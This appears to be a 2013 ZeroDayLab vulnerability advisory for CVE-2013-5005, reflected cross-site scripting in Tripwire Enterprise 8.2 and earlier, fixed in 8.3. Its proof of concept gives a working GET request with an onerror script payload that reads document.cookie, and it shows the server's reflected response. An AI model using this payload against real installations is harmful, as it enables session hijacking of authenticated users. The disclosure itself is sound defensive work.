0207 979 2067 |

ZeroDayLab Advisory - CVE-2013-5005

Author:

Roger Sels (ZeroDayLab Advisories)

Software Version:

Tripwire - Tripwire Enterprise version 8.1 (version 8.1.2.r1697.b180, version as tested) ; Tripwire Enterprise version 8.2 . This has been fixed in version 8.3 .

Title:

Reflected XSS vulnerabilities found in Tripwire Enterprise version 8.2 and prior - Tweet this

Criticality:

Low-Medium

Description:

Tripwire Enterprise, a popular commercial security configuration management solution (http://www.tripwire.com/it-security-software/security-configuration-management/) suffers from reflected cross site scripting issues due to lack of filtering of inputs to the .methodCall.do. page. The following parameters in the .methodCall.do. page are all vulnerable: m_target_class_name, m_target_method_name and m_request_context_params parameters.
Injecting in the afore-mentioned parameters will throw an exception (along with an HTTP/403 Forbidden error message from the server). The output of the exception is not sanitised properly and the javascript code is executed.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials (hijack a session and/or elevate their own privileges) and to launch other attacks.

Proof of concept:

The following GET requests will result in the supplied javascript executing:

1. example for the m_target_class_name parameter:

GET /ajaxRequest/methodCall.do?m_arguments=&m_use_xjson_response_header=true& m_convert_result_to_json=true&m_wrap_json_result=result&m_target_class_na me=com.tripwire.space.ui.web.app.servlet.ajax.AjaxStateMonitor29e0f%3Cimg%20src%3 da%20onerror%3dalert(document.cookie)%3E628fc67ac743f5bbe&m_target_method_nam e=getUserRefreshRate&flatten=true&m_IECachePrevention=1372154383033 HTTP/1.1

The server will reply with:

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
X-JSON: {"AjaxException":{"message":"Unknown class or target method: 'com.tripwire.space.ui.web.app.util.preferences.AjaxUserPreferences.setInteger24f68<img src=a onerror=alert(1)>9c8d48f1addae1a86683fe<img src=a onerror=alert(1)>a66367e223d(...)'","url":"","reloadPage":false}}
Content-Type: text/html;charset=UTF-8
Content-Length: 270
Date: Wed, 26 Jun 2013 14:58:48 GMT
Connection: close

{"AjaxException":{"message":"Unknown class or target method: 'com.tripwire.space.ui.web.app.util.preferences.AjaxUserPreferences.setInteger24f68<img src=a onerror=alert(1)>9c8d48f1addae1a86683fe<img src=a onerror=alert(1)>a66367e223d(...)'","url":"","reloadPage":false}}

The above page cannot be reached without valid credentials. An unauthenticated attacker could still abuse this vulnerability to attack authenticated users by preparing maliciously crafted requests and enticing the victim to use them.

Note: The original requests used the POST method, however it was possible to convert the requests to use the GET method, to enable easier demonstration and delivery of the attack.

Fix

Upgrade to version 8.3 where this issue has now been resolved.

Tags:

XSS, Cross Site Scripting, Poor Filtering